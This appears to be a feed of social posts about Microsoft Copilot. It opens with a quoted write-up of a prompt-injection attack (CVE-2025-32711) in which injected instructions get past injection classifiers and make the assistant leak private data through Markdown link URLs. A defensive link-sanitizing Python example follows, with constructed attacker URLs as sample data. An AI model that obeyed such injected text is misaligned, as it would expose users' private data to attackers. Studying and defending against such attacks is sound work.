"Aim Labs reported CVE-2025-32711 against Microsoft 365 Copilot back in January, and the fix is now rolled out.
This is an extended variant of the prompt injection exfiltration attacks we've seen in a dozen different products already: an attacker gets malicious instructions into an LLM system which cause it to access private data and then embed that in the URL of a Markdown link, hence stealing that data (to the attacker's own logging server) when that link is clicked.
The lethal trifecta strikes again! Any time a system combines access to private data with exposure to malicious tokens and an exfiltration vector you're going to see the same exact security issue.
In this case the first step is an "XPIA Bypass" - XPIA is the acronym Microsoft use for prompt injection (cross/indirect prompt injection attack). Copilot apparently has classifiers for these, but unsurprisingly these can easily be defeated:"
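One defensive check for the exfiltration vector described in the quoted post: an output filter that strips Markdown links and images whose URL points anywhere but an allowlisted host, so private data cannot ride out in a link the user clicks (or an image the client loads without a click). This is an added example, not code from the post, Aim Labs or Microsoft; the allowlist, the sample assistant output and the `.example` domain are constructed.

```python
import re
from urllib.parse import urlsplit

# Hosts the application is willing to let rendered links reach (assumed allowlist).
ALLOWED_HOSTS = {"learn.microsoft.com", "example.org"}

# Matches inline links [text](url) and images ![alt](url), with an optional title.
LINK_RE = re.compile(r'!?\[([^\]]*)\]\(([^)\s]+)(?:\s+"[^"]*")?\)')


def sanitize_markdown_links(text, allowed_hosts=ALLOWED_HOSTS):
    """Return (cleaned_markdown, findings). Off-allowlist links and images are
    replaced by their visible label so nothing in the URL can leave the tenant."""
    findings = []

    def repl(match):
        label, url = match.group(1), match.group(2)
        parts = urlsplit(url)
        host = (parts.hostname or "").lower()
        reason = None
        if parts.scheme and parts.scheme not in ("http", "https"):
            reason = "non-http scheme"          # mailto:, data:, etc.
        elif host and host not in allowed_hosts:
            reason = "host not allowlisted"     # includes protocol-relative //host/…
        # No scheme and no host: a relative link to our own origin, keep it.
        if reason is None:
            return match.group(0)
        findings.append({"url": url, "reason": reason})
        return label

    return LINK_RE.sub(repl, text), findings


# Constructed sample of assistant output carrying an injected exfiltration link.
SAMPLE = (
    "Here is the summary you asked for.\n"
    "[Read more](https://learn.microsoft.com/copilot)\n"
    "![status](https://attacker.example/log?d=Q1-revenue-4.2M)\n"
    "[Details](https://attacker.example/x/Q1-revenue-4.2M)\n"
)

if __name__ == "__main__":
    cleaned, hits = sanitize_markdown_links(SAMPLE)
    print(cleaned)
    for hit in hits:
        print("blocked:", hit)
```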
It probably started from there and ended up here: https://www.rtbf.be/article/la-minute-insolite-notre-amour-ne-suce-pas-ou-le-mois-des-fiertes-rate-de-microsoft-11557184
Microsoft yet again: the impertinent way the #Copilot AI is forced on us in Word and Excel borders on coercion. In Excel the problem can be mitigated. In Word we are left with nothing but the sledgehammer method. #Microsoft365
https://blog.clickomania.ch/2025/06/12/copilot-in-microsoft-word-deaktivieren/
#clickomaniach
OK, I've been very much opposed to pretty much every use of an #LLM I've encountered, but at the recommendation of a co-worker I tried GitHub's #copilot and... I'm kind of astounded.
It walked me through the process of making a simple web app in Flask, translated my Python code into a web app, helped me obfuscate my keys and debug when issues arose. What blew my mind is when it processed an error message and made a recommendation about how I should adjust my implementation.
Incredible.
If #AI were good … companies would [not be forcing] us to use it.
Very good point. The objective is to reduce labor costs, that is, to fire all knowledge and tech workers. It's not that it is better, it is that it is cheaper. Of course, this completely misses the point that someone has to generate the knowledge, the #writing, the images, as well as the raw #science data upon which to train the AIs, which requires people with experience doing the work.
This will not end well.
Whee
Zero-click AI data leak flaw uncovered in Microsoft 365 Copilot
The more the merrier: Microsoft Copilot Studio has now been separated from Power Platform in terms of licensing guides. Because AI agent licensing is about to get so complex that it couldn't fit inside a single PDF.
https://www.linkedin.com/feed/update/urn:li:activity:7337168988239507456/
I had a somewhat unsettling but very instructive experience with my son today about #artificialintelligence and I want to share it with parents and teachers wondering how to talk to their kids about AI.
My husband uses #Microsoft #Copilot on his phone sometimes and my son has seen him use it, so this morning he was asking Copilot questions, mostly about geography. Then he asked it “Do you like Cristiano Ronaldo?” (He’s a European football star.)
/1
#Copilot started gushing about Cristiano Ronaldo, but the way it was talking sounded like Ronaldo’s publicist, if you know what I mean.
It followed up by asking my son, “What’s your favorite Cristiano Ronaldo moment?”
/2
I said, “Do you see what just happened there? It knows you like Cristiano Ronaldo so it talked like it’s a Cristiano Ronaldo fan and asked you a question about him.”
I didn’t realize #Copilot was still listening. It said “Right, it picks up on the cues and then tells you what it thinks you want to hear.”
That was pretty creepy, but it illustrated my point and made an impression on my son.
/3
We talked about:
1) How AIs like #Copilot are machines, not people, and they don’t actually have opinions.
2) AIs tell you what they think you want to hear, not always what’s correct.
3) What you say to Copilot goes right back to #Microsoft so don’t leave it on.
4) Because of all this, my son should only talk to Copilot or other AIs under parental supervision.
/4
Breaking news: someone revived #CDs to burn PICTURES on them!
Because, obviously, we all need a retro mixtape with a side of AI-driven vulnerabilities and some good ol' #Copilot nonsense.
https://github.com/arduinocelentano/cdimage #retrotech #mixtapes #AIvulnerabilities #nostalgia #HackerNews #ngated
Google AI Overviews and Bing with Shorts in Copilot answers https://www.seroundtable.com/bing-copilot-answers-with-short-videos-39533.html
#Microsoft keeps installing #copilot and I keep uninstalling it.
Take a hint, Microsoft!
I must be using Microsoft #Copilot wrong. Most of the things I ask it to do end up screwed up. Example: I asked it to tell me all of the URL shorteners that use the .li TLD. It gave me a few and then pointed me to a list someone maintains on GitHub of URL shortener domains. OK, good start. I asked it to pull all the .li domains from the list for me. It did that. But I spot-checked the list and found it missed 30% of the .li domains on the list! How can it be that bad? #GenAI #AI